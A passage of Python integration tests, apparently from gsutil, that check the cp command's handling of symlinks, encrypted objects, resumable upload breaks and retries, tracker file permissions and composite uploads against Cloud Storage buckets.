os.mkdir(os.path.join(tmpdir, 'missing'))
# Create a symlink to a directory and then remove the directory, leaving a
# broken symlink, to ensure that recursive enumeration doesn't fail on a
# bad symlink.
os.symlink(os.path.join(tmpdir, 'missing'), os.path.join(subdir, 'missing'))
os.rmdir(os.path.join(tmpdir, 'missing'))
self.RunGsUtil(['cp', '-r', '-e', tmpdir, suri(bucket_uri)])
@unittest.skipIf(IS_WINDOWS, 'os.symlink() is not available on Windows.')
def test_cp_minus_e(self):
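"""Tests that cp -e skips symlinks while copying regular files."""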
fpath_dir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=fpath_dir)
fpath2 = os.path.join(fpath_dir, 'cp_minus_e')
bucket_uri = self.CreateBucket()
os.symlink(fpath1, fpath2)
# We also use -c to continue on errors. One of the expanded glob entries
# should be the symlinked file, which should throw a CommandException since
# no valid (non-symlinked) files could be found at that path; we don't want
# the command to terminate if that's the first file we attempt to copy.
stderr = self.RunGsUtil([
'cp', '-e', '-c',
'%s%s*' % (fpath_dir, os.path.sep),
suri(bucket_uri, 'files')
],
return_stderr=True)
self.assertIn('Copying file', stderr)
self.assertIn('Skipping symbolic link', stderr)
# Ensure that top-level arguments are ignored if they are symlinks. The file
# at fpath1 should be successfully copied, then copying the symlink at
# fpath2 should fail.
stderr = self.RunGsUtil(
['cp', '-e', '-r', fpath1, fpath2,
suri(bucket_uri, 'files')],
return_stderr=True,
expected_status=1)
self.assertIn('Copying file', stderr)
self.assertIn('Skipping symbolic link', stderr)
self.assertIn('CommandException: No URLs matched: %s' % fpath2, stderr)
def test_cp_multithreaded_wildcard(self):
"""Tests that cp -m works with a wildcard."""
num_test_files = 5
tmp_dir = self.CreateTempDir(test_files=num_test_files)
bucket_uri = self.CreateBucket()
wildcard_uri = '%s%s*' % (tmp_dir, os.sep)
self.RunGsUtil(['-m', 'cp', wildcard_uri, suri(bucket_uri)])
self.AssertNObjectsInBucket(bucket_uri, num_test_files)
@SequentialAndParallelTransfer
def test_cp_duplicate_source_args(self):
"""Tests that cp -m works when a source argument is provided twice."""
object_contents = b'edge'
object_uri = self.CreateObject(object_name='foo', contents=object_contents)
tmp_dir = self.CreateTempDir()
self.RunGsUtil(['-m', 'cp', suri(object_uri), suri(object_uri), tmp_dir])
with open(os.path.join(tmp_dir, 'foo'), 'rb') as in_fp:
contents = in_fp.read()
# Contents should be not duplicated.
self.assertEqual(contents, object_contents)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
@SequentialAndParallelTransfer
def test_cp_download_encrypted_object(self):
"""Tests downloading an encrypted object."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
object_contents = b'bar'
object_uri = self.CreateObject(object_name='foo',
contents=object_contents,
encryption_key=TEST_ENCRYPTION_KEY1)
fpath = self.CreateTempFile()
boto_config_for_test = [('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
with SetBotoConfigForTest(boto_config_for_test):
self.RunGsUtil(['cp', suri(object_uri), suri(fpath)])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), object_contents)
# If multiple keys are supplied and one is correct, download should succeed.
fpath2 = self.CreateTempFile()
boto_config_for_test2 = [
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY3),
('GSUtil', 'decryption_key1', TEST_ENCRYPTION_KEY2),
('GSUtil', 'decryption_key2', TEST_ENCRYPTION_KEY1)
]
with SetBotoConfigForTest(boto_config_for_test2):
self.RunGsUtil(['cp', suri(object_uri), suri(fpath2)])
with open(fpath2, 'rb') as f:
self.assertEqual(f.read(), object_contents)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
@SequentialAndParallelTransfer
def test_cp_download_encrypted_object_without_key(self):
"""Tests downloading an encrypted object without the necessary key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
object_contents = b'bar'
object_uri = self.CreateObject(object_name='foo',
contents=object_contents,
encryption_key=TEST_ENCRYPTION_KEY1)
fpath = self.CreateTempFile()
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath)],
expected_status=1,
return_stderr=True)
self.assertIn(
'Missing decryption key with SHA256 hash %s' %
TEST_ENCRYPTION_KEY1_SHA256_B64, stderr)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
@SequentialAndParallelTransfer
def test_cp_upload_encrypted_object(self):
"""Tests uploading an encrypted object."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri = suri(bucket_uri, 'foo')
file_contents = b'bar'
fpath = self.CreateTempFile(contents=file_contents, file_name='foo')
boto_config_for_test = [('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
# Uploading the object should succeed.
with SetBotoConfigForTest(boto_config_for_test):
self.RunGsUtil(['cp', suri(fpath), suri(bucket_uri)])
self.AssertObjectUsesCSEK(object_uri, TEST_ENCRYPTION_KEY1)
with SetBotoConfigForTest(boto_config_for_test):
# Reading the object back should succeed.
fpath2 = self.CreateTempFile()
self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), suri(fpath2)])
with open(fpath2, 'rb') as f:
self.assertEqual(f.read(), file_contents)
@SkipForS3('No resumable upload or encryption support for S3.')
def test_cp_resumable_upload_encrypted_object_break(self):
"""Tests that an encrypted upload resumes after a connection break."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri_str = suri(bucket_uri, 'foo')
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath, object_uri_str
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
stderr = self.RunGsUtil(['cp', fpath, object_uri_str], return_stderr=True)
self.assertIn('Resuming upload', stderr)
stdout = self.RunGsUtil(['stat', object_uri_str], return_stdout=True)
with open(fpath, 'rb') as fp:
self.assertIn(CalculateB64EncodedMd5FromContents(fp), stdout)
self.AssertObjectUsesCSEK(object_uri_str, TEST_ENCRYPTION_KEY1)
@SkipForS3('No resumable upload or encryption support for S3.')
def test_cp_resumable_upload_encrypted_object_different_key(self):
"""Tests that an encrypted upload resume uses original encryption key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri_str = suri(bucket_uri, 'foo')
file_contents = b'a' * self.halt_size
fpath = self.CreateTempFile(contents=file_contents)
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath, object_uri_str
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
# Resume the upload with multiple keys, including the original.
boto_config_for_test2 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'decryption_key1',
TEST_ENCRYPTION_KEY2),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
with SetBotoConfigForTest(boto_config_for_test2):
stderr = self.RunGsUtil(['cp', fpath, object_uri_str], return_stderr=True)
self.assertIn('Resuming upload', stderr)
# Object should have the original key.
self.AssertObjectUsesCSEK(object_uri_str, TEST_ENCRYPTION_KEY1)
@SkipForS3('No resumable upload or encryption support for S3.')
def test_cp_resumable_upload_encrypted_object_missing_key(self):
"""Tests that an encrypted upload does not resume without original key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri_str = suri(bucket_uri, 'foo')
file_contents = b'a' * self.halt_size
fpath = self.CreateTempFile(contents=file_contents)
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath, object_uri_str
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
# Resume the upload without the original key.
boto_config_for_test2 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)]
with SetBotoConfigForTest(boto_config_for_test2):
stderr = self.RunGsUtil(['cp', fpath, object_uri_str], return_stderr=True)
self.assertNotIn('Resuming upload', stderr)
self.assertIn('does not match current encryption key', stderr)
self.assertIn('Restarting upload from scratch', stderr)
# Object should have the new key.
self.AssertObjectUsesCSEK(object_uri_str, TEST_ENCRYPTION_KEY2)
def _ensure_object_unencrypted(self, object_uri_str):
"""Strongly consistent check that the object is unencrypted."""
stdout = self.RunGsUtil(['stat', object_uri_str], return_stdout=True)
self.assertNotIn('Encryption Key', stdout)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break(self):
"""Tests that an upload can be resumed after a connection break."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
return_stderr=True)
self.assertIn('Resuming upload', stderr)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_cp_resumable_upload_gzip_encoded_break(self):
"""Tests that a gzip encoded upload can be resumed."""
# Setup the bucket and local data. File contents are randomized to prevent
# them from compressing below the resumable-threshold and failing the test.
bucket_uri = self.CreateBucket()
contents = get_random_ascii_chars(size=self.halt_size)
local_uri = self.CreateTempFile(file_name='test.txt', contents=contents)
# Configure boto
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'-D', 'cp', '-J', '--testcallbackfile', test_callback_file, local_uri,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
self.assertIn('Artifically halting upload', stderr)
stderr = self.RunGsUtil(['-D', 'cp', '-J', local_uri,
suri(bucket_uri)],
return_stderr=True)
self.assertIn('Resuming upload', stderr)
# Ensure the progress logger is still seeing a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
# Ensure the files do not have a stored encoding of gzip and are stored
# uncompressed.
temp_uri = self.CreateTempFile()
remote_uri = suri(bucket_uri, 'test.txt')
stdout = self.RunGsUtil(['stat', remote_uri], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
self.RunGsUtil(['cp', remote_uri, suri(temp_uri)])
with open(temp_uri, 'rb') as f:
self.assertEqual(f.read(), contents)
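  # A minimal illustrative sketch (hypothetical helper, not called by any test
  # in this suite) of the reasoning behind randomizing contents above: a run of
  # identical bytes deflates to almost nothing, while random ASCII letters stay
  # close to their original size, keeping the upload above the resumable
  # threshold. Only the standard library is used here.
  def _example_compare_compressibility(self):
    import zlib  # Local import; zlib may not be imported at module level.
    repeated = b'a' * (64 * ONE_KIB)
    randomized = ''.join(
        random.choice(string.ascii_letters) for _ in range(64 * ONE_KIB)
    ).encode('ascii')
    # Repeated bytes compress to a tiny fraction of their original size.
    self.assertLess(len(zlib.compress(repeated)), ONE_KIB)
    # Random letters compress far less, staying well above the repeated case.
    self.assertGreater(len(zlib.compress(randomized)),
                       100 * len(zlib.compress(repeated)))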
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_retry(self):
"""Tests that a resumable upload completes with one retry."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
# TODO: Raising an httplib or socket error blocks bucket teardown
# in JSON for 60-120s on a multiprocessing lock acquire. Figure out why;
# until then, raise an apitools retryable exception.
if self.test_api == ApiSelector.XML:
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_ResumableUploadRetryHandler(5, http_client.BadStatusLine, (
'unused',))))
else:
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_ResumableUploadRetryHandler(
5, apitools_exceptions.BadStatusCodeError, ('unused', 'unused',
'unused'))))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'-D', 'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
                              return_stderr=True)
if self.test_api == ApiSelector.XML:
self.assertIn('Got retryable failure', stderr)
else:
self.assertIn('Retrying', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_streaming_upload_retry(self):
"""Tests that a streaming resumable upload completes with one retry."""
if self.test_api == ApiSelector.XML:
return unittest.skip('XML does not support resumable streaming uploads.')
bucket_uri = self.CreateBucket()
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_ResumableUploadRetryHandler(5, apitools_exceptions.BadStatusCodeError,
('unused', 'unused', 'unused'))))
# Need to reduce the JSON chunk size since streaming uploads buffer a
# full chunk.
boto_configs_for_test = [('GSUtil', 'json_resumable_chunk_size',
str(256 * ONE_KIB)), ('Boto', 'num_retries', '2')]
with SetBotoConfigForTest(boto_configs_for_test):
stderr = self.RunGsUtil([
'-D', 'cp', '--testcallbackfile', test_callback_file, '-',
suri(bucket_uri, 'foo')
],
stdin='a' * 512 * ONE_KIB,
                              return_stderr=True)
self.assertIn('Retrying', stderr)
@SkipForS3('preserve_acl flag not supported for S3.')
def test_cp_preserve_no_owner(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
# Anonymous user can read the object and write to the bucket, but does
# not own the object.
self.RunGsUtil(['acl', 'ch', '-u', 'AllUsers:R', suri(object_uri)])
self.RunGsUtil(['acl', 'ch', '-u', 'AllUsers:W', suri(bucket_uri)])
with self.SetAnonymousBotoCreds():
stderr = self.RunGsUtil(
['cp', '-p', suri(object_uri),
suri(bucket_uri, 'foo')],
return_stderr=True,
expected_status=1)
self.assertIn('OWNER permission is required for preserving ACLs', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_progress_callbacks(self):
bucket_uri = self.CreateBucket()
final_size_string = BytesToFixedWidthString(1024**2)
final_progress_callback = final_size_string + '/' + final_size_string
fpath = self.CreateTempFile(contents=b'a' * ONE_MIB, file_name='foo')
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
return_stderr=True)
      self.assertEqual(1, stderr.count(final_progress_callback))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(2 * ONE_MIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
return_stderr=True)
      self.assertEqual(1, stderr.count(final_progress_callback))
stderr = self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), fpath],
return_stderr=True)
      self.assertEqual(1, stderr.count(final_progress_callback))
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload(self):
"""Tests that a basic resumable upload completes successfully."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
self.RunGsUtil(['cp', fpath, suri(bucket_uri)])
@SkipForS3('No resumable upload support for S3.')
def test_resumable_upload_break_leaves_tracker(self):
"""Tests that a tracker file is created with a resumable upload."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(file_name='foo', contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
tracker_filename = GetTrackerFilePath(
StorageUrlFromString(suri(bucket_uri, 'foo')), TrackerFileType.UPLOAD,
self.test_api)
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
try:
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri, 'foo')
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
self.assertTrue(os.path.exists(tracker_filename),
'Tracker file %s not present.' % tracker_filename)
# Test the permissions
if os.name == 'posix':
mode = oct(stat.S_IMODE(os.stat(tracker_filename).st_mode))
          # Assert that only the user has read/write permission.
self.assertEqual(oct(0o600), mode)
finally:
DeleteTrackerFile(tracker_filename)
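  # Illustrative sketch (hypothetical helper, not part of gsutil's test API) of
  # the permission check performed above: os.stat().st_mode includes file-type
  # bits, so stat.S_IMODE is applied first to keep only the permission bits
  # before comparing against the expected owner-only mode of 0o600.
  def _example_assert_owner_only_mode(self, path):
    if os.name != 'posix':
      return  # Permission bits are only meaningful for this check on POSIX.
    mode = stat.S_IMODE(os.stat(path).st_mode)
    self.assertEqual(0o600, mode)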
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break_file_size_change(self):
"""Tests a resumable upload where the uploaded file changes size.
This should fail when we read the tracker data.
"""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * self.halt_size)
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * self.halt_size * 2)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('ResumableUploadAbortException', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break_file_content_change(self):
"""Tests a resumable upload where the uploaded file changes content."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'XML doesn\'t make separate HTTP calls at fixed-size boundaries for '
'resumable uploads, so we can\'t guarantee that the server saves a '
'specific part of the upload.')
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * ONE_KIB * ONE_KIB)
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
HaltingCopyCallbackHandler(True,
int(ONE_KIB) * 512)))
resumable_threshold_for_test = ('GSUtil', 'resumable_threshold',
str(ONE_KIB))
resumable_chunk_size_for_test = ('GSUtil', 'json_resumable_chunk_size',
str(ONE_KIB * 256))
with SetBotoConfigForTest(
[resumable_threshold_for_test, resumable_chunk_size_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'b' * ONE_KIB * ONE_KIB)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('doesn\'t match cloud-supplied digest', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break_file_smaller_size(self):
"""Tests a resumable upload where the uploaded file changes content.
This should fail hash validation.
"""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * ONE_KIB * ONE_KIB)
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
HaltingCopyCallbackHandler(True,
int(ONE_KIB) * 512)))
resumable_threshold_for_test = ('GSUtil', 'resumable_threshold',
str(ONE_KIB))
resumable_chunk_size_for_test = ('GSUtil', 'json_resumable_chunk_size',
str(ONE_KIB * 256))
with SetBotoConfigForTest(
[resumable_threshold_for_test, resumable_chunk_size_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * ONE_KIB)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('ResumableUploadAbortException', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_composite_encrypted_upload_resume(self):
"""Tests that an encrypted composite upload resumes successfully."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
dst_url = StorageUrlFromString(suri(bucket_uri, 'foo'))
file_contents = b'foobar'
file_name = 'foobar'
source_file = self.CreateTempFile(contents=file_contents,
file_name=file_name)
src_url = StorageUrlFromString(source_file)
# Simulate an upload that had occurred by writing a tracker file
# that points to a previously uploaded component.
tracker_file_name = GetTrackerFilePath(dst_url,
TrackerFileType.PARALLEL_UPLOAD,
self.test_api, src_url)
tracker_prefix = '123'
# Create component 0 to be used in the resume; it must match the name
# that will be generated in copy_helper, so we use the same scheme.
encoded_name = (PARALLEL_UPLOAD_STATIC_SALT + source_file).encode(UTF8)
content_md5 = GetMd5()
content_md5.update(encoded_name)
digest = content_md5.hexdigest()
component_object_name = (tracker_prefix + PARALLEL_UPLOAD_TEMP_NAMESPACE +
digest + '_0')
component_size = 3
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name=component_object_name,
contents=file_contents[:component_size],
encryption_key=TEST_ENCRYPTION_KEY1)
existing_component = ObjectFromTracker(component_object_name,
str(object_uri.generation))
existing_components = [existing_component]
enc_key_sha256 = TEST_ENCRYPTION_KEY1_SHA256_B64
WriteParallelUploadTrackerFile(tracker_file_name,
tracker_prefix,
existing_components,
encryption_key_sha256=enc_key_sha256)
try:
# Now "resume" the upload using the original encryption key.
with SetBotoConfigForTest([
('GSUtil', 'parallel_composite_upload_threshold', '1'),
('GSUtil', 'parallel_composite_upload_component_size',
str(component_size)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)
]):
stderr = self.RunGsUtil(
['cp', source_file, suri(bucket_uri, 'foo')], return_stderr=True)
self.assertIn('Found 1 existing temporary components to reuse.', stderr)
self.assertFalse(
os.path.exists(tracker_file_name),
'Tracker file %s should have been deleted.' % tracker_file_name)
read_contents = self.RunGsUtil(['cat', suri(bucket_uri, 'foo')],
return_stdout=True)
self.assertEqual(read_contents.encode('ascii'), file_contents)
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
@SkipForS3('No resumable upload support for S3.')
def test_cp_composite_encrypted_upload_restart(self):
"""Tests that encrypted composite upload restarts given a different key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
dst_url = StorageUrlFromString(suri(bucket_uri, 'foo'))
file_contents = b'foobar'
source_file = self.CreateTempFile(contents=file_contents, file_name='foo')
src_url = StorageUrlFromString(source_file)
# Simulate an upload that had occurred by writing a tracker file.
tracker_file_name = GetTrackerFilePath(dst_url,
TrackerFileType.PARALLEL_UPLOAD,
self.test_api, src_url)
tracker_prefix = '123'
existing_component_name = 'foo_1'
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo_1',
contents=b'foo',
encryption_key=TEST_ENCRYPTION_KEY1)
existing_component = ObjectFromTracker(existing_component_name,
str(object_uri.generation))
existing_components = [existing_component]
enc_key_sha256 = TEST_ENCRYPTION_KEY1_SHA256_B64
WriteParallelUploadTrackerFile(tracker_file_name, tracker_prefix,
existing_components,
enc_key_sha256.decode('ascii'))
try:
# Now "resume" the upload using the original encryption key.
with SetBotoConfigForTest([
('GSUtil', 'parallel_composite_upload_threshold', '1'),
('GSUtil', 'parallel_composite_upload_component_size', '3'),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)
]):
stderr = self.RunGsUtil(
['cp', source_file, suri(bucket_uri, 'foo')], return_stderr=True)
self.assertIn(
'does not match current encryption key. '
'Deleting old components and restarting upload', stderr)
self.assertNotIn('existing temporary components to reuse.', stderr)
self.assertFalse(
os.path.exists(tracker_file_name),
'Tracker file %s should have been deleted.' % tracker_file_name)
read_contents = self.RunGsUtil(['cat', suri(bucket_uri, 'foo')],
return_stdout=True)
self.assertEqual(read_contents.encode('ascii'), file_contents)
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_composite_upload(self):
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'abcd')
obj_suri = suri(bucket_uri, 'composed')
key_fqn = self.authorize_project_to_use_testing_kms_key()
with SetBotoConfigForTest([
('GSUtil', 'encryption_key', key_fqn),
('GSUtil', 'parallel_composite_upload_threshold', '1'),
('GSUtil', 'parallel_composite_upload_component_size', '1')
]):
self.RunGsUtil(['cp', fpath, obj_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj_suri, key_fqn)
# This temporarily changes the tracker directory to unwritable which
# interferes with any parallel running tests that use the tracker directory.
@NotParallelizable
@SkipForS3('No resumable upload support for S3.')
@unittest.skipIf(IS_WINDOWS, 'chmod on dir unsupported on Windows.')
@SequentialAndParallelTransfer
def test_cp_unwritable_tracker_file(self):
"""Tests a resumable upload with an unwritable tracker file."""
bucket_uri = self.CreateBucket()
tracker_filename = GetTrackerFilePath(
StorageUrlFromString(suri(bucket_uri, 'foo')), TrackerFileType.UPLOAD,
self.test_api)
tracker_dir = os.path.dirname(tracker_filename)
fpath = self.CreateTempFile(file_name='foo', contents=b'a' * ONE_KIB)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
save_mod = os.stat(tracker_dir).st_mode
try:
os.chmod(tracker_dir, 0)
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('Couldn\'t write tracker file', stderr)
finally:
os.chmod(tracker_dir, save_mod)
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
# This temporarily changes the tracker directory to unwritable which
# interferes with any parallel running tests that use the tracker directory.
@NotParallelizable
@unittest.skipIf(IS_WINDOWS, 'chmod on dir unsupported on Windows.')
@SequentialAndParallelTransfer
def test_cp_unwritable_tracker_file_download(self):
"""Tests downloads with an unwritable tracker file."""
object_uri = self.CreateObject(contents=b'foo' * ONE_KIB)
tracker_filename = GetTrackerFilePath(
StorageUrlFromString(suri(object_uri)), TrackerFileType.DOWNLOAD,
self.test_api)
tracker_dir = os.path.dirname(tracker_filename)
fpath = self.CreateTempFile()
save_mod = os.stat(tracker_dir).st_mode
try:
os.chmod(tracker_dir, 0)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(EIGHT_MIB))
with SetBotoConfigForTest([boto_config_for_test]):
# Should succeed because we are below the threshold.
self.RunGsUtil(['cp', suri(object_uri), fpath])
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
expected_status=1,
return_stderr=True)
self.assertIn('Couldn\'t write tracker file', stderr)
finally:
os.chmod(tracker_dir, save_mod)
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
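  # The two unwritable-tracker tests above share the same chmod-then-restore
  # pattern around the tracker directory. A minimal sketch of how that pattern
  # could be wrapped in a context manager using only the standard library
  # (hypothetical helper; not part of gsutil's test utilities and not called by
  # the tests above):
  def _example_make_dir_unwritable(self, path):
    """Returns a context manager that strips permissions, then restores them."""
    import contextlib  # Local import; contextlib may not be imported above.
    @contextlib.contextmanager
    def _unwritable():
      saved_mode = os.stat(path).st_mode
      os.chmod(path, 0)
      try:
        yield path
      finally:
        os.chmod(path, saved_mode)
    return _unwritable()
  # Usage sketch: with self._example_make_dir_unwritable(tracker_dir): ...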
def _test_cp_resumable_download_break_helper(self,
boto_config,
encryption_key=None):
"""Helper function for different modes of resumable download break.
Args:
boto_config: List of boto configuration tuples for use with
SetBotoConfigForTest.
encryption_key: Base64 encryption key for object encryption (if any).
"""
bucket_uri = self.CreateBucket()
file_contents = b'a' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=file_contents,
encryption_key=encryption_key)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
